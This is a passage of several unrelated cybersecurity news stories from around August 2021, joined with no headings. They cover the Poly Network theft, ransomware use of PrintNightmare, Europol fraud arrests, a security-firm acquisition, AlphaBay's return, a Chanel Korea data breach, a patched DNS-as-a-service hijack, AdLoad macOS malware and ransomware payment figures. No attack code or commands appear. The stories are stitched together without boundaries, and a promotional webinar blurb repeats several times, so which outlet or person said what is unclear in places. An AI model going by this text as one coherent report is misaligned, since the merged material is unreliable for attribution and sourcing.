    Following the incident, Poly Network took to Twitter to urge the attackers to return the money, stating: “We want to establish communication with you and urge you to return the hacked assets. The amount of money you hacked is the biggest one in defi history. Law enforcement in any country will regard this as a major economic crime and you will be pursued. It is very unwise for you to do any further transactions. The money you stole are from tens of thousands of crypto currency members, hence the people.

    “You should talk to us to work out a solution.”

    The hacker subsequently posted a three-page ‘Q&A’ in which they provided more details on how they carried out the heist and claimed to have ethical motives, stating it was “always the plan” to return the funds and that they “not very interested in money.” The hacker added: “I know it hurts when people are attacked, but shouldn’t they learn something from those hacks?”

    Poly Network has since revealed that $260m of “assets” have been returned via three types of cryptocurrencies: $3.3m worth of Ethereum, $256m worth of Binance Coin and $1m worth of Polygon. However, $269m worth of Ethereum and $84m worth of Polygon are still not recovered.

    Commenting on the story, Arseny Reutov, head of the application security research team at Positive Technologies, said: “When such a massive hack occurs, everyone’s attention is fixed on a particular cryptocurrency address. Although DeFi is non-custodial, some protocols can blacklist any address, for example, USDT stablecoin, which blacklisted the attacker’s address preventing him or her from moving the funds.

    “Withdrawing such a large amount of money is a challenge in cryptocurrency. Although there are some cryptocurrency mixers that can complicate the tracking of the funds, it appears the hacker quickly realized he or she didn’t have a plan for this, which likely led to the decision to transfer the stolen funds back.”

    Ransomware operators such as Magniber and Vice Society are actively exploiting vulnerabilities in Windows Print Spooler to compromise victims and spread laterally across a victim’s network to deploy file-encrypting payloads on targeted systems.

    “Multiple, distinct threat actors view this vulnerability as attractive to use during their attacks and may indicate that this vulnerability will continue to see more widespread adoption and incorporation by various adversaries moving forward,” Cisco Talos said in a report published Thursday, corroborating an independent analysis from CrowdStrike, which observed instances of Magniber ransomware infections targeting entities in South Korea.

    While Magniber ransomware was first spotted in late 2017 singling out victims in South Korea through malvertising campaigns, Vice Society is a new entrant that emerged on the ransomware landscape in mid-2021, primarily targeting public school districts and other educational institutions. The attacks are said to have taken place since at least July 13.

    Since June, a series of “PrintNightmare” issues affecting the Windows print spooler service has come to light that could enable remote code execution when the component performs privileged file operations –

    • CVE-2021-1675 – Windows Print Spooler Remote Code Execution Vulnerability (Patched on June 8)
    • CVE-2021-34527 – Windows Print Spooler Remote Code Execution Vulnerability (Patched on July 6-7)
    • CVE-2021-34481 – Windows Print Spooler Remote Code Execution Vulnerability (Patched on August 10)
    • CVE-2021-36936 – Windows Print Spooler Remote Code Execution Vulnerability (Patched on August 10)
    • CVE-2021-36947 – Windows Print Spooler Remote Code Execution Vulnerability (Patched on August 10)
    • CVE-2021-34483 – Windows Print Spooler Elevation of Privilege Vulnerability (Patched on August 10)
    • CVE-2021-36958 – Windows Print Spooler Remote Code Execution Vulnerability (Unpatched)

    CrowdStrike noted it was able to successfully prevent attempts made by the Magniber ransomware gang at exploiting the PrintNightmare vulnerability.

    Vice Society, on the other hand, leveraged a variety of techniques to conduct post-compromise discovery and reconnaissance prior to bypassing native Windows protections for credential theft and privilege escalation.

    Specifically, the attacker is believed to have used a malicious library associated with the PrintNightmare flaw (CVE-2021-34527) to pivot to multiple systems across the environment and extract credentials from the victim.

    “Adversaries are constantly refining their approach to the ransomware attack lifecycle as they strive to operate more effectively, efficiently, and evasively,” the researchers said. “The use of the vulnerability known as PrintNightmare shows that adversaries are paying close attention and will quickly incorporate new tools that they find useful for various purposes during their attacks.”

    Found this article interesting? Follow THN on Facebook, Twitter  and LinkedIn to read more exclusive content we post.

    Police in Europe have arrested nearly two dozen individuals on suspicion of being part of an international group of online fraudsters.

    The alleged cyber-criminals are accused of cheating companies in at least 20 countries out of approximately $1.17m.

    Charges were brought against 23 individuals on August 10. The suspects were taken into custody in a series of raids simultaneously carried out at 34 addresses in Ireland, Romania, and the Netherlands.

    Europol, which coordinated the action, said the cyber-criminal gang had been running scams for years, updating its tactics to exploit current events.

    “The fraud was run by an organized crime group which prior to the COVID-19 pandemic already illegally offered other fictitious products for sale online, such as wooden pellets,” said Europol in a press release.

    “Last year the criminals changed their modus operandi and started offering protective materials after the outbreak of the COVID-19 pandemic.”

    The group accused of running the scams is allegedly made up of individuals hailing from various countries in Africa, who relocated to Europe. There, they created fake web pages and email addresses that allowed them to impersonate legitimate wholesale companies.

    Members of the group, posing as employees of these wholesalers, would then defraud other companies by soliciting orders from them and requesting payments in advance of goods’ being shipped.

    Victims companies – most of which were located in Europe and Asia – sent the money in good faith; however, the goods they had ordered never arrived.

    Europol said that the gang’s criminal proceeds “were laundered through Romanian bank accounts controlled by the criminals before being withdrawn at ATMs.”

    An ongoing investigation into the cyber-criminal gang has been supported by Europol since 2017. Assistance offered by the organization included the deployment of two of its cyber-crime experts to the raids that took place in the Netherlands to help secure relevant evidence and support Dutch authorities with cross-checking data against real-time information gathered during the operation.

    This latest coordinated action against cybercrime follows an Interpol operation that led to the arrest of an alleged 45-year-old sexual predator and human trafficker on August 6 in Guatemala. The unnamed man is suspected of producing and distributing child sexual abuse material.

    A boutique cybersecurity firm that provides the financial, health care and retail sectors with custom security services has been acquired by technology security firm GoVanguard.

    Gotham Security, acquired by the firm for an undisclosed sum, was described by GoVanguard CEO Mahdi Hedhli as a close partner of some years’ standing.

    The headquarters of Gotham Security are situated a two-minute walk away from world-famous landmark the Empire State Building. The company, which specializes in professional security services and managed security SOC services, has a second office in Washington, DC.

    Gotham Security CEO Trevor Goering and COO Blake Shalem co-founded the company in 2013. Following the acquisition, Shalem will be joining GoVanguard as its chief customer officer.

    She said: “This move allows us to elevate what we do best, which translates to a superior class of protection for our clients.”

    GoVanguard said the acquisition would allow it to provide elite-level cybersecurity to its clients, which include Odyssey Group, nTopology, Insurance Technologies, and Abacus Group.

    “As threat actors become more sophisticated, it’s become obvious that the best defense is to go on the offensive. Adversary simulation has become increasingly valuable for organizations looking to quickly gauge and improve their security position. After all, if you can’t measure it, you can’t improve it,” said Hedhli.

    “Gotham Security has been a close partner for years, and this was a natural next step to allow our red-teaming experts to take our clients’ defenses to the next level and continue our dedication to finding the security gaps before cyber-criminals do.”

    Gotham offers security assessments that include penetration testing, phishing vulnerability analysis, and an evaluation of an organization’s system for weak points.

    GoVanguard said that the acquisition was part of a move to provide clients with adversarial red-team tactic cybersecurity assistance that could identify and resolve vulnerabilities before cyber-criminals had a chance to strike.

    “We’re doubling down on our commitment to improve the cybersecurity landscape by honing our focus on red teaming,” Hedhli said. “We feel this is the area where GoVanguard makes the biggest impact for our clients and the industry as a whole.”

    Illicit underground marketplace relaunches years after takedown.

    The illicit marketplace AlphaBay appears to have resurfaced, four years after a high-profile takedown by international law enforcement agencies.

    The reboot, according to researchers at Flashpoint, isn’t an exact a replica. Rather, the reconstituted version of the site is described as an homage to the original and a tribute to the now deceased alleged AlphaBay moderator Alexandre Cazes.

    This latest revamp is headed by threat actor DeSnake, who is believed to be an original moderator of AlphaBay. According to Flashpoint researchers, DeSnake is attempting to win the trust of criminals by claiming “threat actors operating on the forum [can] withdraw funds even if all servers are seized.”

    Other changes include the banning of posts about illicit drugs, COVID-19 vaccines and ransomware. Site operators also say they will remove posts related to threat activity related to Russia, Belarus, Kazakhstan, Armenia and Kyrgyzstan to avoid unwanted attention by law enforcement in those countries.

    An additional pitch by the service’s operators, promises to “updated source code for a famous banking trojan” as a promotional tactic for the service. There is no indication as to what “famous” banking trojan is.

    Hacker Heyday

    When AlphaBay was shut down in 2017 in a joint effort by law enforcement across Europe and Asia it has more than 200,000 user and 40,000 vendors selling illicit goods. At the time Threatpost reported there was more than 250,000 listings for drugs and toxic chemicals, 100,000 for malware, hacking tools, guns, fake documents and much more.

    The old AlphaBay’s infrastructure supported what is believed to be the largest known criminal market on the internet. It was seized by U.S. officials along with authorities in Thailand, the Netherlands, Lithuania, Canada, France and the U.K.

    AlphaBay was a Tor hidden service and its vendors and customers sold and bought goods using Bitcoin, Monero, Ethereum and other cryptocurrencies. Authorities said the market was also used to launder hundreds of millions of dollars.

    In its blogpost, Flashpoint said, its initial AlphaBay report was based on one by Tom Robinson at Elliptic.

    Worried about where the next attack is coming from? We’ve got your back. REGISTER NOW for our upcoming live webinar, How to Think Like a Threat Actor, in partnership with Uptycs. Find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on Aug. 17 at 11AM EST for this LIVE discussion.

    The Korean arm of French luxury brand Chanel has issued an apology after personal data belonging to its customers was exposed.

    In a statement issued earlier this week, Chanel Korea blamed the data leak that happened on August 8 on a recent cyber-attack. A database belonging to the famed perfume and fashion brand is believed to have been compromised by a hacker or hackers at some point between August 5 and 6.

    Data exfiltrated in the attack and later leaked included some customers’ names, birth dates, gender, phone numbers, and shopping history.

    The Korea Herald reported that other sensitive information contained in the compromised database, including customers’ IDs, passwords, and payment information, had not been leaked.

    “Parts of our database, containing the personal information of the customers who had registered for our cosmetics brand membership, have been compromised. The leaked personal information included names, birthdays, phone numbers and product purchase lists,” Chanel Korea wrote on its official website.

    The company asked customers who suspect that their data has been misused to make contact by phone or email.

    “We sincerely apologize to our customers for the matter and the inconvenience it caused,” stated Chanel Korea.

    The company went on to say that it has hired “a leading independent cybersecurity firm” to investigate the attack and gauge its full impact.

    Chanel Korea said that it had not found any “evidence of further impact on other systems and data” but had reported the incident to the Korea Internet & Security Agency (KISA). The matter is also under investigation by Korea’s Personal Information Protection Commission (PIPC).

    Customers are reportedly being informed of the cyber-attack and data breach via email and text messages. Chanel Korea has not published details on how many individuals were impacted by the security incidents.

    One Chanel Korea customer told the Korea Times that the brand ought to do more than just apologize to its customers.

    They said: “When we think of Chanel, we expect the best-quality products and high-level service. That is why we spend thousands of dollars at their boutiques. Chanel Korea should compensate its customers who were affected by the cyber-attack.”

    Threatpost interviews Wiz CTO about a vulnerability recently patched by Amazon Route53’s DNS service and Google Cloud DNS.

    LAS VEGAS – Amazon and Google patched a domain name service (DNS) bug that allowed attackers to snoop on the confidential networking settings of companies – revealing computer and employee names along with office locations and exposed web resources.

    The vulnerability, outlined in a Black Hat USA 2021 talk last week, is a new class of vulnerabilities affecting major DNS-as-a-Service (DNSaaS) providers, according to researchers at the cloud security firm Wiz.

    Ami Luttwak, co-founder and CTO of Wiz, said the bug allows an adversary to conduct unprecedented reconnaissance on a target – namely any vulnerable corporate network that inadvertently allows this type of network eavesdropping.

    While Amazon and Google have patched the bug, Luttwak warns the problem is likely widespread.

    Threatpost caught up with Luttwak at Black Hat and in the video below.

    Wiz revealed the vulnerability affecting DNSaaS providers Amazon Route53 and Google Cloud DNS, which both promptly patched the bug in February.

    Going Down the DNS Loophole

    “We found a simple loophole that allowed us to intercept a portion of worldwide dynamic DNS traffic going through managed DNS providers like Amazon and Google. Essentially, we ‘wiretapped’ the internal network traffic of 15,000 organizations (including Fortune 500 companies and government agencies) and millions of devices,” Wiz wrote in a technical breakdown of the bug.

    Luttwak calls what he found a “loophole” within the process used to handle the now obsolete dynamic DNS within modern DNS server configurations.

    “We registered a new domain on the Route 53 platform with the same name as their official DNS server. (Technically, we created a new ‘hosted zone’ inside AWS name server ns-1611.awsdns-09.co.uk and named it ‘ns-852.awsdns-42.net’),” researchers explained.

    Next, researchers gained control of the hosted zone by registering thousands of domain name servers as the same name as the DNSaaS official DNS server. “Whenever a DNS client queries this name server about itself (which thousands of devices do automatically to update their IP address within their managed network – more on that in a minute), that traffic goes directly to our IP address,” Wiz wrote.

    What researchers observed next was a flood of dynamic DNS traffic from Windows machines that were querying the “hijacked name server” about itself. In all, researchers profiled 15,000 organizations (some Fortune 500 companies), 45 U.S. government agencies and 85 international government agencies.

    Misconfiguration or Vulnerability?

    DNSaaS providers Route53 and Google Cloud DNS fixed the issue by disallowing the type of copycat registration that mirrored their own DNS server.

    As for Microsoft, researchers said that the company considered this to be a misconfiguration issue.

    “Microsoft could provide a global solution by updating its dynamic DNS algorithm. However, when we reported our discovery to Microsoft, they told us that they did not consider it a vulnerability but rather a known misconfiguration that occurs when an organization works with external DNS resolvers,” researchers said.

    Luttwak said that companies can avoid this type of DNS exploitation by configuring their DNS resolvers properly so dynamic DNS updates do not leave the internal network.

    Worried about where the next attack is coming from? We’ve got your back. REGISTER NOW for our upcoming live webinar, How to Think Like a Threat Actor, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on Aug. 17 at 11AM EST for this LIVE discussion.

    A crush of new attacks using the well-known adware involves at least 150 updated samples, many of which aren’t recognized by Apple’s built-in security controls.

    A swelling wave of AdLoad malware infections in macOS devices is cresting its way past Apple’s on-device malware scanner, researchers said. The campaign is using around 150 unique samples, some of which are signed by Apple’s notarization service.

    AdLoad is a well-known Apple threat that’s been circulating for years. It’s essentially a trojan that opens a backdoor on the affected system in order to download and install adware or potentially unwanted programs (PUPs). It’s also capable of gathering and transmitting information about victim machines, such as username and computer name. It’s also been seen hijacking search engine results and injecting advertisements into web pages.

    It’s changed up its tactics lately, creating an opportunity to evade on-board security.

    “This year we have seen another iteration that continues to impact Mac users who rely solely on Apple’s built-in security control XProtect for malware detection,” Phil Stokes, researcher at SentinelOne’s SentinelLabs, said in a Wednesday posting. “XProtect arguably has around 11 different signatures for AdLoad [but] the variant used in this new campaign is undetected by any of those rules.”

    The AdLoader Infection Routine

    The 2021 variants of AdLoad have a new approach to infection, the researcher said. First, they begin their assault by installing a persistence agent in the user’s Library LaunchAgents folder, using either the .system or .service file extension, according to Stokes’ technical analysis.

    When the user logs in, that persistence agent executes a binary hidden in the same user’s ~/Library/Application Support/folder. That folder in Application Support in turn contains another directory called /Services/, which itself contains a “minimal application bundle,” Stokes explained.

    That bundle contains an executable dropper with the same name. There’s also a hidden tracker file called .logg that contains a universally unique identifier (UUID) for the victim; it’s also included in the Application Support folder, Stokes said.

    The droppers are slightly obfuscated Zsh scripts which unpack a series of times before finally executing the malware (a shell script) out of the /tmp directory, he noted. Many of them are signed or notarized.

    “Typically, we observe that developer certificates used to sign the droppers are revoked by Apple within a matter of days (sometimes hours) of samples being observed on VirusTotal, offering some belated and temporary protection against further infections by those particular signed samples by means of Gatekeeper and OCSP signature checks,” Stokes said. “Also typically, we see new samples signed with fresh certificates appearing within a matter of hours and days. Truly, it is a game of whack-a-mole.”

    In any event, “the final payload isn’t known to the current version of Apple’s XProtect, v2149,” he explained.

    Capitalizing on Apple XProtect Gaps

    SentinelLabs’ researchers observed the latest AdLoader samples used in campaigns starting as early as November of last year, but it wasn’t until this summer – July and August in particular – that the volume of attacks and samples began to tick up sharply.

    “It certainly seems possible that the malware developers are taking advantage of the gap in XProtect…At the time of writing, XProtect was last updated to version 2149 around June 15 – 18,” Stokes said, adding that the malware does have a high detection rate in VirusTotal. “The fact that hundreds of unique samples of a well-known adware variant have been circulating for at least 10 months and yet still remain undetected by Apple’s built-in malware scanner demonstrates the necessity of adding further endpoint security controls to Mac devices.”

    Worried about where the next attack is coming from? We’ve got your back. REGISTER NOW for our upcoming live webinar, How to Think Like a Threat Actor, in partnership with Uptycs. Find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on Aug. 17 at 11AM EST for this LIVE discussion.

    Unit 42 puts the average payout at over half a million, while Barracuda has tracked a 64 percent year over year spike in the number of attacks.

    Two reports slap hard figures on what’s already crystal clear: Ransomware attacks have skyrocketed, and ransomware payments are the comet trails that have followed them skyward.

    The average ransomware payment spiked 82 percent year over year: It’s now over half a million dollars, according to the first-half 2021 update report put out by Palo Alto Networks’ Unit 42. As far as the sheer multitude of attacks goes, Barracuda researchers on Thursday reported that they’ve identified and analyzed 121 ransomware incidents so far in 2021, a 64 percent increase in attacks, year-over-year.

    What’s helped to intensify extortion payments is the fact that cybercriminals have been pouring money into “highly profitable ransomware operations,” Unit 42 researchers wrote, including a new, disturbing trend: The rise of “quadruple extortion.”

    Thumbscrews Have Quadrupled

    Double extortion has been around for more than a year: That’s when threat actors not only paralyze a victim’s systems and/or data but also threaten to leak compromised data or use it in future spam attacks if victims balk at paying extortion demands.

    But during the first half of 2021, Unit 42 researchers observed ransomware groups commonly using as many as four techniques to turn the thumbscrews on victims, adding denial-of-service (DoS) attacks and harassment of a victim’s connections to the pain: Encryption: Victims pay to regain access to scrambled data and compromised computer systems that stop working because key files are encrypted. Data Theft: Hackers release sensitive information if a ransom is not paid. DoS: Ransomware gangs launch DoS attacks that shut down a victim’s public websites. Harassment: Cybercriminals contact customers, business partners, employees and media to tell them the organization was hacked.

    These “increasingly aggressive” tactics have fattened ransoms that were already increasingly engorged. Unit 42 reported last year that the average payment last year had surged 171 percent, to more than $312,000. During the first half of this year, that shot up to a record $570,000.

    “While it’s rare for one organization to be the victim of all four techniques, this year we have increasingly seen ransomware gangs engage in additional approaches when victims don’t pay up after encryption and data theft,” Unit 42 reported.

    “Among the dozens of cases that Unit 42 consultants reviewed in the first half of 2021, the average ransom demand was $5.3 million. That’s up 518 percent from the 2020 average of $847,000,” researchers observed.

    More statistics include the highest ransom demand of a single victim spotted by Unit 42, which rose to $50 million in the first half of 2021, up from $30 million last year. So far this year, the largest payment confirmed by Unit 42 was the $11 million that JBS SA disclosed after a massive attack in June. Last year, the largest payment Unit 42 observed was $10 million.

    Barracuda has also tracked a spike in ransom demands: In the attacks that it’s observed, the average ransom ask per incident was more than $10 million, with only 18 percent of the incidents involving a ransom demand of less than that. Meanwhile 30 percent of the incidents had greater than $30 million ransom asks.

    But for its part, Barracuda traced the cause of spiked extortion demands to the wider adoption of cryptocurrency. It said that this increased prevalence of cryptocurrency has led to “a correlation of increased ransomware attacks and higher ransom amounts. With increased crackdown on bitcoin and successful tracing of transactions, criminals are starting to provide alternative payments methods, such as the REvil ransomware gang asking for Monero instead of Bitcoin.”

    REvil’s New Tactic: Dangling a Pricey Decryptor Key

    Unit 42 researchers also alluded to a new tactic that REvil pulled out of its hat: After attacking Kaseya and its customers, REvil operators offered to sell a universal decryption key that would unloack all organizations affected by the attack, for $70 million – an asking price it quickly dropped to $50 million.

    That would have helped a lot of Kaseya’s customers, many of which were managed service providers (MSPs) that use the company’s VSA product. At least 60 customers in 22 countries were hit in the spate of worldwide cyberattacks on July 2. Eventually, Kaseya did get its hands on a decryptor, but it’s not clear how much it paid, if anything. (A purported master key was leaked online earlier this week, but researchers said that the decryptor is of little use to other companies hit in the attacks, which were unleashed before the notorious ransomware group went dark.)

    Barter Hard

    The drop in asking price for REvil’s decryptor is mirrored by other instances of shrinking ransom demands. Barracuda pointed out several instances of ransomware gangs responding to negotiation tactics, including:

    • JBS negotiated a $22.5 million ransom payment down to $11 million.
    • Brenntag, a chemical distributor in Germany, negotiated a $7.5 million ransom demand down to $4.4 million.

    “The initial ransom ask may not be the final ask, so if they’re planning to pay, it is important for ransomware victims to exercise negotiation options,” according to Barracuda’s Fleming Shi. “The outcome can be savings in the millions.”

    Who’s Getting Picked On

    In his Thursday post, Shi said that the ransomware thugs are picking on victims of all sizes. “The grim outlook for the future of ransomware leaves no one spared from financial damage or brand-crushing headlines,” Shi wrote. “Ransomware criminals are penetrating the foundation of our digital economy, from trusted software vendors to IT service providers.”

    While ransomware gangs are still “heavily targeting” municipalities, healthcare and education, attacks on other businesses are “surging,” the researcher said. “Attacks on corporations, such as infrastructure, travel, financial services, and other businesses, made up 57 percent of all ransomware attacks between August 2020 and July 2021, up from just 18 percent in our 2020 study. Infrastructure-related businesses account for 10 percent of all the attacks we studied.”

    After analyzing more than 120 incidents from August 2020 until July 2021, Barracuda’s research team found that ransomware attacks increased 64 percent year over year, and that REvil and DarkSide were responsible for 27 percent of those attacks.

    A multiplier effect is brought into play, given that ransomware attacks are “quickly evolving to software supply-chain attacks, which reach more businesses in a single attempt,” Shi explained, with Kaseya being just one case in point. Others are the airline industry and the JBS Foods attacks, the latter of which led to the meat supplier being forced to shut down operations in the U.S. and Australia.

    Source: Barracuda.

    While the U.S. is still in attackers’ crosshairs, Barracuda found that ransomware attacks are proliferating across the globe. “Just under half of the attacks in the past 12 months hit U.S organizations (44 percent). In comparison, 30 percent of the incidents happened in EMEA, 11 percent were in Asia Pacific countries, 10 percent were in South America, and 8 percent were in Canada and Mexico,” Shi said.

    Source: Barracuda.

    The Ransomware Crystal Ball

    Unit 42 predicted that ransom demands will continue to spiral upwards, but that some gangs will continue to focus on smaller businesses that can’t afford to invest heavily in cybersecurity defenses.

    “So far this year, we have observed groups, including NetWalker, SunCrypt and LockBit, demanding and taking in payments ranging from $10,000 to $50,000,” researchers noted. “While they may seem small compared to the largest ransoms we observed, payments that size can have a debilitating impact on a small organization.”

    Unit 42 also expected to see more targeting of hypervisors, given that can lead to corruption of multiple virtual instances running on a single server. One example was seen last month, when researchers observed a Linux Variant of REvil ransomware targeting VMware’s ESXi virtual machine management software and network attached storage (NAS) devices that run on the Linux operating system (OS).

    Worried about where the next attack is coming from? We’ve got your back. REGISTER NOW for our upcoming live webinar, How to Think Like a Threat Actor, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on Aug. 17 at 11AM EST for this LIVE discussion.